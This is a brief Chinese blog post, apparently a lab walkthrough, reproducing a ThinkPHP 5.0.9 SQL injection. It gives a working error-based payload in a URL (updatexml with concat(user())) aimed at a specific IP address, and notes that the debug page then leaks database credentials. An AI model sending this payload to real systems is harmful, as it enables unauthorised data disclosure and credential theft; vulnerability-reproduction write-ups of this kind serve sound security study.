环境:thinkphp5.0.9

启动后,访问

http://188.40.189.134/index.php?ids[]=1&ids[]=2

即可看到用户名被显示了出来,说明环境运行成功。

访问

http://188.40.189.134/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

信息成功被爆出:

当然,这是一个比较鸡肋的SQL注入漏洞。但通过DEBUG页面,我们找到了数据库的账号、密码:

属于一个敏感信息泄露漏洞。

大概就这些……

说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...